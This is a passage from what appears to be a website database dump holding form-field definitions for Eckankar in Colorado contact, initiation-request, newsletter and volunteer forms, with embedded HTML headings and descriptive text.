Name','lastname_8',3,0x01,'','above',0x01),(99,'Email','email_10','email',10,'2022-09-21 22:03:37',NULL,'Email','email_10',4,0x01,'','above',0x01),(100,'Phone','phone_9','phone',10,'2022-09-21 22:03:37',NULL,'Phone','phone_9',5,0x01,'','above',0x01),(101,'Your Local Area','listselect_11','listselect',10,'2022-09-21 22:03:37',NULL,'Your Local Area','listselect_11',6,0x01,'','above',0x00),(102,'hr','hr_13','hr',10,'2022-09-21 22:03:37',NULL,'hr','hr_13',7,0x00,'','',0x00),(103,'Colorado Leadership Positions','html_14','html',10,'2022-09-21 22:03:37',NULL,'Colorado Leadership Positions','html_14',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','',0x00),(104,'Select the person you would like to email','listselect_15','listselect',10,'2022-09-21 22:03:37',NULL,'Select the person you would like to email','listselect_15',9,0x01,'','above',0x00),(105,'Enter Your Message Here','textarea_16','textarea',10,'2022-09-21 22:03:37',NULL,'Enter Your Message Here','textarea_16',10,0x01,'','above',0x00),(107,'Submit','submit_12','submit',10,'2022-09-21 22:03:37',NULL,'Submit','submit_12',12,0x00,'','',0x00),(108,'Text','html_117','html',11,'2022-09-21 23:06:10',NULL,'Text','html_117',1,0x00,'<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(109,'First Name','textbox_118','textbox',11,'2022-09-21 23:06:10',NULL,'First Name','textbox_118',2,0x01,'','above',0x00),(110,'Last Name','lastname_119','lastname',11,'2022-09-21 23:06:10',NULL,'Last Name','lastname_119',3,0x01,'','above',0x01),(111,'Email','email_120','email',11,'2022-09-21 23:06:10',NULL,'Email','email_120',4,0x01,'','above',0x01),(112,'Phone','phone_121','phone',11,'2022-09-21 23:06:10',NULL,'Phone','phone_121',5,0x01,'','above',0x01),(113,'Your Local Area','listselect_122','listselect',11,'2022-09-21 23:06:10',NULL,'Your Local Area','listselect_122',6,0x01,'','above',0x00),(116,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166439207','listselect',11,'2022-09-21 23:06:10',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166439207',7,0x01,'','above',0x00),(117,'Enter Your Message Here','textarea_126','textarea',11,'2022-09-21 23:06:10',NULL,'Enter Your Message Here','textarea_126',8,0x01,'','above',0x00),(119,'Submit','submit_128','submit',11,'2022-09-21 23:06:10',NULL,'Submit','submit_128',10,0x00,'','',0x00),(120,'Text','html_32','html',12,'2022-09-21 23:03:31',NULL,'Text','html_32',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>','',0x00),(121,'First Name','textbox_33','textbox',12,'2022-09-21 23:03:31',NULL,'First Name','textbox_33',2,0x01,'','above',0x00),(122,'Last Name','lastname_34','lastname',12,'2022-09-21 23:03:31',NULL,'Last Name','lastname_34',3,0x01,'','above',0x01),(123,'Email','email_35','email',12,'2022-09-21 23:03:31',NULL,'Email','email_35',4,0x01,'','above',0x01),(124,'Phone','phone_36','phone',12,'2022-09-21 23:03:31',NULL,'Phone','phone_36',5,0x01,'','above',0x01),(125,'Your Local Area','listselect_37','listselect',12,'2022-09-21 23:03:31',NULL,'Your Local Area','listselect_37',6,0x01,'','above',0x00),(126,'hr','hr_38','hr',12,'2022-09-21 23:03:31',NULL,'hr','hr_38',7,0x00,'','',0x00),(127,'Colorado Springs Leadership Positions','html_39','html',12,'2022-09-21 23:03:31',NULL,'Colorado Springs Leadership Positions','html_39',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>','',0x00),(128,'Select the person you would like to email','listselect_40','listselect',12,'2022-09-21 23:03:31',NULL,'Select the person you would like to email','listselect_40',9,0x01,'','above',0x00),(129,'Enter Your Message Here','textarea_41','textarea',12,'2022-09-21 23:03:31',NULL,'Enter Your Message Here','textarea_41',10,0x01,'','above',0x00),(131,'Submit','submit_43','submit',12,'2022-09-21 23:03:31',NULL,'Submit','submit_43',12,0x00,'','',0x00),(132,'Text','html_267','html',13,'2022-09-20 16:28:20',NULL,'Text','html_267',1,0x00,'<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below','',0x00),(133,'First Name','textbox_268','textbox',13,'2022-09-20 16:28:20',NULL,'First Name','textbox_268',2,0x01,'','above',0x00),(134,'Last Name','lastname_269','lastname',13,'2022-09-20 16:28:20',NULL,'Last Name','lastname_269',3,0x01,'','above',0x01),(135,'Email','email_270','email',13,'2022-09-20 16:28:20',NULL,'Email','email_270',4,0x01,'','above',0x01),(136,'hr','hr_273','hr',13,'2022-09-20 16:28:20',NULL,'hr','hr_273',5,0x00,'','',0x00),(137,'Message Subject','textbox_303','textbox',13,'2022-09-20 16:28:20',NULL,'Message Subject','textbox_303',6,0x01,'','above',0x00),(138,'Enter Your Message Here','textarea_276','textarea',13,'2022-09-20 16:28:20',NULL,'Enter Your Message Here','textarea_276',7,0x01,'','above',0x00),(139,'Text','html_305','html',13,'2022-09-20 16:28:20',NULL,'Text','html_305',8,0x00,'Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','',0x00),(141,'Submit','submit_278','submit',13,'2022-09-20 16:32:23',NULL,'Submit','submit_278',10,0x00,'','',0x00),(142,'HTML','html_1515012877904','html',14,'2021-02-12 20:56:43',NULL,'HTML','html_1515012877904',1,0x00,'<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Johnstown Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(143,'First Name','firstname_1515012036721','firstname',14,'2019-08-07 23:16:31',NULL,'First Name','firstname_1515012036721',2,0x01,'','default',0x01),(144,'Last Name','lastname_1515012040393','lastname',14,'2019-08-07 23:16:31',NULL,'Last Name','lastname_1515012040393',3,0x01,'','default',0x01),(145,'Email','email_1515012046399','email',14,'2019-08-07 23:16:31',NULL,'Email','email_1515012046399',4,0x01,'','default',0x01),(146,'Phone','phone_1515012055554','phone',14,'2019-08-07 23:16:31',NULL,'Phone','phone_1515012055554',5,0x01,'','default',0x01),(147,'Your Local Area','your_local_area_1515013258725','listselect',14,'2021-02-12 20:50:50',NULL,'Your Local Area','your_local_area_1515013258725',6,0x01,'','above',0x00),(150,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166502762','listselect',14,'2022-09-21 22:08:57',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166502762',7,0x01,'','above',0x00),(151,'Enter Your Message Here','enter_your_message_here_1515013766874','textarea',14,'2022-09-21 22:08:57',NULL,'Enter Your Message Here','enter_your_message_here_1515013766874',8,0x01,'','above',0x00),(153,'Submit','submit_1515013824829','submit',14,'2022-09-21 22:08:57',NULL,'Submit','submit_1515013824829',10,0x00,'','',0x00),(154,'Text','html_129','html',15,'2022-09-21 22:09:22',NULL,'Text','html_129',1,0x00,'<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(155,'First Name','textbox_130','textbox',15,'2022-09-21 22:09:22',NULL,'First Name','textbox_130',2,0x01,'','above',0x00),(156,'Last Name','lastname_131','lastname',15,'2022-09-21 22:09:22',NULL,'Last Name','lastname_131',3,0x01,'','above',0x01),(157,'Email','email_132','email',15,'2022-09-21 22:09:22',NULL,'Email','email_132',4,0x01,'','above',0x01),(158,'Phone','phone_133','phone',15,'2022-09-21 22:09:22',NULL,'Phone','phone_133',5,0x01,'','above',0x01),(159,'Your Local Area','listselect_134','listselect',15,'2022-09-21 22:09:22',NULL,'Your Local Area','listselect_134',6,0x01,'','above',0x00),(162,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166597727','listselect',15,'2022-09-21 22:09:22',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166597727',7,0x01,'','above',0x00),(163,'Enter Your Message Here','textarea_138','textarea',15,'2022-09-21 22:09:22',NULL,'Enter Your Message Here','textarea_138',8,0x01,'','above',0x00),(165,'Submit','submit_140','submit',15,'2022-09-21 22:09:22',NULL,'Submit','submit_140',10,0x00,'','',0x00),(166,'Text','html_44','html',16,'2022-09-21 22:47:52',NULL,'Text','html_44',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>','',0x00),(167,'First Name','textbox_45','textbox',16,'2022-09-21 22:47:52',NULL,'First Name','textbox_45',2,0x01,'','above',0x00),(168,'Last Name','lastname_46','lastname',16,'2022-09-21 22:47:52',NULL,'Last Name','lastname_46',3,0x01,'','above',0x01),(169,'Email','email_47','email',16,'2022-09-21 22:47:52',NULL,'Email','email_47',4,0x01,'','above',0x01),(170,'Phone','phone_48','phone',16,'2022-09-21 22:47:52',NULL,'Phone','phone_48',5,0x01,'','above',0x01),(171,'Your Local Area','listselect_49','listselect',16,'2022-09-21 22:47:52',NULL,'Your Local Area','listselect_49',6,0x01,'','above',0x00),(172,'hr','hr_50','hr',16,'2022-09-21 22:47:52',NULL,'hr','hr_50',7,0x00,'','',0x00),(173,'Loveland Leadership Positions','html_51','html',16,'2022-09-21 22:47:52',NULL,'Loveland Leadership Positions','html_51',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>','',0x00),(174,'Select the person you would like to email','listselect_52','listselect',16,'2022-09-21 22:47:52',NULL,'Select the person you would like to email','listselect_52',9,0x01,'','above',0x00),(175,'Enter Your Message Here','textarea_53','textarea',16,'2022-09-21 22:47:52',NULL,'Enter Your Message Here','textarea_53',10,0x01,'','above',0x00),(177,'Submit','submit_55','submit',16,'2022-09-21 22:47:52',NULL,'Submit','submit_55',12,0x00,'','',0x00),(178,'HTML','html_1550094026658','html',17,'2019-08-07 23:18:40',NULL,'HTML','html_1550094026658',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - MEMBERS Newsletter Signup</span></span></span></strong></span></h3>\nGet the latest news from around the state!','',0x00),(179,'First Name','firstname_1550094074971','firstname',17,'2019-08-12 16:35:53',NULL,'First Name','firstname_1550094074971',2,0x01,'','default',0x01),(180,'Last Name','lastname_1550094079880','lastname',17,'2019-08-12 16:35:53',NULL,'Last Name','lastname_1550094079880',3,0x01,'','default',0x01),(181,'Email','email_1550094081455','email',17,'2019-08-12 16:33:32',NULL,'Email','email_1550094081455',4,0x01,'','default',0x01),(182,'US States','liststate_1550094094681','liststate',17,'2019-08-12 16:35:53',NULL,'US States','liststate_1550094094681',5,0x01,'','default',0x00),(183,'Country','listcountry_1550094096365','listcountry',17,'2019-08-12 16:35:53',NULL,'Country','listcountry_1550094096365',6,0x01,'US','default',0x00),(184,'Choose your subscription(s)','choose_your_subscription_s_1550099095640','listmultiselect',17,'2019-08-07 23:18:40',NULL,'Choose your subscription(s)','choose_your_subscription_s_1550099095640',7,0x01,'','above',0x00),(186,'Submit','submit_1550094251707','submit',17,'2019-08-07 23:18:40',NULL,'Submit','submit_1550094251707',9,0x00,'','',0x00),(187,'Text','html_68','html',18,'2022-09-21 22:49:10',NULL,'Text','html_68',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Communications</span></span></span></strong></span></h3>','',0x00),(188,'First Name','textbox_69','textbox',18,'2022-09-21 22:49:10',NULL,'First Name','textbox_69',2,0x01,'','above',0x00),(189,'Last Name','lastname_70','lastname',18,'2022-09-21 22:49:10',NULL,'Last Name','lastname_70',3,0x01,'','above',0x01),(190,'Email','email_71','email',18,'2022-09-21 22:49:10',NULL,'Email','email_71',4,0x01,'','above',0x01),(191,'Phone','phone_72','phone',18,'2022-09-21 22:49:10',NULL,'Phone','phone_72',5,0x01,'','above',0x01),(192,'Your Local Area','listselect_73','listselect',18,'2022-09-21 22:49:10',NULL,'Your Local Area','listselect_73',6,0x01,'','above',0x00),(193,'hr','hr_74','hr',18,'2022-09-21 22:49:10',NULL,'hr','hr_74',7,0x00,'','',0x00),(194,'Northwest Leadership Positions','html_75','html',18,'2022-09-21 22:49:10',NULL,'Northwest Leadership Positions','html_75',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Positions</span></span></span></strong></span></h3>','',0x00),(195,'Select the person you would like to email','listselect_76','listselect',18,'2022-09-21 22:49:10',NULL,'Select the person you would like to email','listselect_76',9,0x01,'','above',0x00),(196,'Enter Your Message Here','textarea_77','textarea',18,'2022-09-21 22:49:10',NULL,'Enter Your Message Here','textarea_77',10,0x01,'','above',0x00),(198,'Submit','submit_79','submit',18,'2022-09-21 22:49:10',NULL,'Submit','submit_79',12,0x00,'','',0x00),(199,'Text','html_153','html',19,'2022-09-21 22:49:59',NULL,'Text','html_153',1,0x00,'<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(200,'First Name','textbox_154','textbox',19,'2022-09-21 22:49:59',NULL,'First Name','textbox_154',2,0x01,'','above',0x00),(201,'Last Name','lastname_155','lastname',19,'2022-09-21 22:49:59',NULL,'Last Name','lastname_155',3,0x01,'','above',0x01),(202,'Email','email_156','email',19,'2022-09-21 22:49:59',NULL,'Email','email_156',4,0x01,'','above',0x01),(203,'Phone','phone_157','phone',19,'2022-09-21 22:49:59',NULL,'Phone','phone_157',5,0x01,'','above',0x01),(204,'Your Local Area','listselect_158','listselect',19,'2022-09-21 22:49:59',NULL,'Your Local Area','listselect_158',6,0x01,'','above',0x00),(207,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166754232','listselect',19,'2022-09-21 22:49:59',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166754232',7,0x01,'','above',0x00),(208,'Enter Your Message Here','textarea_162','textarea',19,'2022-09-21 22:49:59',NULL,'Enter Your Message Here','textarea_162',8,0x01,'','above',0x00),(210,'Submit','submit_164','submit',19,'2022-09-21 22:49:59',NULL,'Submit','submit_164',10,0x00,'','',0x00),(211,'Text','html_165','html',20,'2022-09-21 22:50:32',NULL,'Text','html_165',1,0x00,'<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(212,'First Name','textbox_166','textbox',20,'2022-09-21 22:50:32',NULL,'First Name','textbox_166',2,0x01,'','above',0x00),(213,'Last Name','lastname_167','lastname',20,'2022-09-21 22:50:32',NULL,'Last Name','lastname_167',3,0x01,'','above',0x01),(214,'Email','email_168','email',20,'2022-09-21 22:50:32',NULL,'Email','email_168',4,0x01,'','above',0x01),(215,'Phone','phone_169','phone',20,'2022-09-21 22:50:32',NULL,'Phone','phone_169',5,0x01,'','above',0x01),(216,'Your Local Area','listselect_170','listselect',20,'2022-09-21 22:50:32',NULL,'Your Local Area','listselect_170',6,0x01,'','above',0x00),(219,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166807240','listselect',20,'2022-09-21 22:50:32',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166807240',7,0x01,'','above',0x00),(220,'Enter Your Message Here','textarea_174','textarea',20,'2022-09-21 22:50:32',NULL,'Enter Your Message Here','textarea_174',8,0x01,'','above',0x00),(222,'Submit','submit_176','submit',20,'2022-09-21 22:50:32',NULL,'Submit','submit_176',10,0x00,'','',0x00),(223,'Text','html_306','html',21,'2022-09-20 16:47:26',NULL,'Text','html_306',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3><p> <span style=\"font-size: 18px;\">Get the latest news from around the state!</span></p>','',0x00),(224,'First Name','textbox_307','textbox',21,'2022-09-20 16:47:26',NULL,'First Name','textbox_307',2,0x01,'','above',0x00),(225,'Last Name','lastname_308','lastname',21,'2022-09-20 16:47:26',NULL,'Last Name','lastname_308',3,0x01,'','above',0x01),(226,'Email','email_309','email',21,'2022-09-20 16:47:26',NULL,'Email','email_309',4,0x01,'','above',0x01),(227,'State','listselect_316','listselect',21,'2019-08-07 23:20:41',NULL,'State','listselect_316',5,0x01,'','above',0x00),(228,'Country','listcountry_317','listcountry',21,'2019-08-07 23:20:41',NULL,'Country','listcountry_317',6,0x01,'US','above',0x00),(229,'Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>','listmultiselect_318','listmultiselect',21,'2019-08-07 23:20:41',NULL,'Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>','listmultiselect_318',7,0x01,'','above',0x00),(230,'Text','html_313','html',21,'2022-09-20 16:47:26',NULL,'Text','html_313',8,0x00,'<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>&nbsp;','',0x00),(232,'Submit','submit_315','submit',21,'2022-09-20 16:47:26',NULL,'Submit','submit_315',10,0x00,'','',0x00),(233,'Text','html_177','html',22,'2022-09-21 22:51:36',NULL,'Text','html_177',1,0x00,'<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(234,'First Name','textbox_178','textbox',22,'2022-09-21 22:51:36',NULL,'First Name','textbox_178',2,0x01,'','above',0x00),(235,'Last Name','lastname_179','lastname',22,'2022-09-21 22:51:36',NULL,'Last Name','lastname_179',3,0x01,'','above',0x01),(236,'Email','email_180','email',22,'2022-09-21 22:51:36',NULL,'Email','email_180',4,0x01,'','above',0x01),(237,'Phone','phone_181','phone',22,'2022-09-21 22:51:36',NULL,'Phone','phone_181',5,0x01,'','above',0x01),(238,'Your Local Area','listselect_182','listselect',22,'2022-09-21 22:51:36',NULL,'Your Local Area','listselect_182',6,0x01,'','above',0x00),(241,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166886411','listselect',22,'2022-09-21 22:51:36',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166886411',7,0x01,'','above',0x00),(242,'Enter Your Message Here','textarea_186','textarea',22,'2022-09-21 22:51:36',NULL,'Enter Your Message Here','textarea_186',8,0x01,'','above',0x00),(244,'Submit','submit_188','submit',22,'2022-09-21 22:51:36',NULL,'Submit','submit_188',10,0x00,'','',0x00),(245,'Text','html_189','html',23,'2022-09-21 22:52:07',NULL,'Text','html_189',1,0x00,'<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(246,'First Name','textbox_190','textbox',23,'2022-09-21 22:52:07',NULL,'First Name','textbox_190',2,0x01,'','above',0x00),(247,'Last Name','lastname_191','lastname',23,'2022-09-21 22:52:07',NULL,'Last Name','lastname_191',3,0x01,'','above',0x01),(248,'Email','email_192','email',23,'2022-09-21 22:52:07',NULL,'Email','email_192',4,0x01,'','above',0x01),(249,'Phone','phone_193','phone',23,'2022-09-21 22:52:07',NULL,'Phone','phone_193',5,0x01,'','above',0x01),(250,'Your Local Area','listselect_194','listselect',23,'2022-09-21 22:52:07',NULL,'Your Local Area','listselect_194',6,0x01,'','above',0x00),(253,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166940171','listselect',23,'2022-09-21 22:52:07',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166940171',7,0x01,'','above',0x00),(254,'Enter Your Message Here','textarea_198','textarea',23,'2022-09-21 22:52:07',NULL,'Enter Your Message Here','textarea_198',8,0x01,'','above',0x00),(256,'Submit','submit_200','submit',23,'2022-09-21 22:52:07',NULL,'Submit','submit_200',10,0x00,'','',0x00),(257,'Text','html_220','html',24,'2021-02-26 22:05:36',NULL,'Text','html_220',1,0x00,'<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities <br></span></span></span></strong></span></h3>\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong><br>- Sri Harold Klemp, <em>Ask the Master, Book 2</em></p><p>We are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\n\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.</p><p><em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em></p>','',0x00),(258,'First Name','textbox_221','textbox',24,'2021-02-26 22:05:36',NULL,'First Name','textbox_221',2,0x01,'','above',0x00),(259,'Last Name','lastname_222','lastname',24,'2021-02-26 22:05:36',NULL,'Last Name','lastname_222',3,0x01,'','above',0x01),(260,'Email','email_223','email',24,'2021-02-26 22:05:36',NULL,'Email','email_223',4,0x01,'','above',0x01),(261,'Phone','phone_224','phone',24,'2021-02-26 22:05:36',NULL,'Phone','phone_224',5,0x01,'','above',0x01),(262,'Your Local Area','listselect_225','listselect',24,'2021-02-26 22:05:36',NULL,'Your Local Area','listselect_225',6,0x01,'','above',0x00),(263,'hr','hr_226','hr',24,'2021-02-26 22:05:36',NULL,'hr','hr_226',7,0x00,'','',0x00),(264,'Service Opportunities','html_227','html',24,'2021-02-26 22:05:36',NULL,'Service Opportunities','html_227',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>','',0x00),(265,'Book Discussions','listmultiselect_228','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Book Discussions','listmultiselect_228',9,0x00,'','above',0x00),(266,'Community HU','listmultiselect_232','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Community HU','listmultiselect_232',10,0x00,'','above',0x00),(267,'ECK Worship Service','listmultiselect_233','listmultiselect',24,'2021-02-26 22:12:59',NULL,'ECK Worship Service','listmultiselect_233',15,0x00,'','above',0x00),(268,'Email Newsletter Help','listmultiselect_234','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Email Newsletter Help','listmultiselect_234',13,0x00,'','above',0x00),(269,'Round Tables','listmultiselect_235','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Round Tables','listmultiselect_235',14,0x00,'','above',0x00),(270,'Satsangs','listmultiselect_236','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Satsangs','listmultiselect_236',11,0x00,'','above',0x00),(271,'Vahana','listmultiselect_237','listmultiselect',24,'2021-02-26 22:12:59',NULL,'Vahana','listmultiselect_237',12,0x00,'','above',0x00),(272,'Message (optional)','textarea_229','textarea',24,'2021-02-26 22:05:36',NULL,'Message (optional)','textarea_229',16,0x00,'','above',0x00),(274,'Submit','submit_231','submit',24,'2021-02-26 22:05:36',NULL,'Submit','submit_231',18,0x00,'','',0x00),(275,'Text','html_321','html',25,'2022-09-21 22:53:09',NULL,'Text','html_321',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span 